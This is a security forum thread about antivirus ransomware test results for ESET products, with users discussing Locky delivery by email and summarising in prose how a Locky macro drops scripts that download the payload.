Jump to content

Ransonware Test Results


Recommended Posts

Ref.: https://avlab.pl/sites/default/files/68files/ENG_2016_ransomware.pdf

 

For testing, we used 28 malicious software files of crypto ransomware. Among others there were: Cerber, CryptXXX, DetoxCrypto, Hitler Ransomware, HolyCrypt, Locky, Numecod, Petya, Jigsaw, Vipasana, Stampado and many others. The study included the total amount of 28 samples collected in a collaboration with independent researchers.

 

Test Results

 

Smart Security ver. 9 - 25/28

Smart Security ver. 10 beta - 27/28

 

Summary

 

Upgrade to ver. 10 ASAP. Perhaps Eset could have them retest w/final of ver. 10?

 

Link to post
Share on other sites

Also noteworthy is the vast majority of ransomware is delivered via e-mail; primarily in attachments. The overwhelming ransomware delivered this way is Locky as noted below. Would be illuminating to see a test of Eset's Internet/Smart Security client e-mail protection against Locky. 

 

 

According to the 2016 Verizon DBIR, email is the #1 delivery channel for malware. And what percentage of that malware delivered over email is ransomware? According to Proofpoint, over 96 percent.

 

post-6784-0-55490400-1478886564_thumb.png

 

Ref: https://blog.barkly.com/ransomware-attacks-bypassing-antivirus#0

Edited by itman
Link to post
Share on other sites

In regards to Locky ransomware, they are variants of it that begin their infection process using .bat scripts. Would like to know if Eset's ver. 10 script protection includes monitoring of cmd.exe which can run hidden and conhost.exe

Link to post
Share on other sites
  • Administrators

I don't recall seeing Locky started by batch files. It's mainly js or vbs files that are spread by spammed email and when run, they download Locky's binary and execute it.

Link to post
Share on other sites

FYI.

 

After some additional deobfuscation on the VBA macro I combined the 3 parts to reveal full script and the actions performed.

 

1.     VBA macro creates file %temp%\arra.bat

 

2.     Writes decodes and writes value of textbox1 and textbox2 to arra.bat

 

3.     Executes %temp%\arra.bat

 

3.1.  Arra.bat in turn creates %tmp%\dasdee.vbs

3.2.  Echo’s the script contents to the dasdee.vbs script

3.3.  Executes dasdee.vbs using cscript

 

3.3.1.      dasdee.vbs performs a GET request to the http address passed in parameter %0% and saves the response to the location in parameter %1%

 

post-6784-0-11937300-1479053345_thumb.png

 

 

3.4.   The bat file then executes the file save by the vbs script, deletes the vbs scripts and deletes itself.

 

Ref.: https://www.sternsecurity.com/blog/locky-ransomware-analysis

Edited by itman
Link to post
Share on other sites

Noteworthy is that Microsoft has "beefed up" macro protection in Office 2016 and recently 2013. So cmd.exe protection is not that critical in those versions. However, there are still enterprises and individuals using pre-2013 Pro. or non-Pro. versions of Office.

Link to post
Share on other sites
  • 4 weeks later...
  • Administrators

The latest TorrentLocker :)

 

        Baidu                      Win32.Trojan.WisdomEyes.16070401.9500.9928
        ESET-NOD32                 a variant of Win32/Injector.DIOL
        CrowdStrike                malicious_confidence_89% (D)
3/56 ON 2016-12-09 09:41:16

Link to post
Share on other sites
  • 3 weeks later...

Here's one for Eset to research: https://malwaretips.com/threads/self-made-ransomware-vs-antivirus-products.66903/

Basically a 0-day that remained so for quite a while. Introduced into the wild on 12/12. Nine days later, only 12 vendors on VirusTotal had a signature for it and Eset was not one of them. As noted in the testor's comments on Malwaretips, Eset Smart Security failed to detect it.

Link to post
Share on other sites
  • 1 month later...
  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...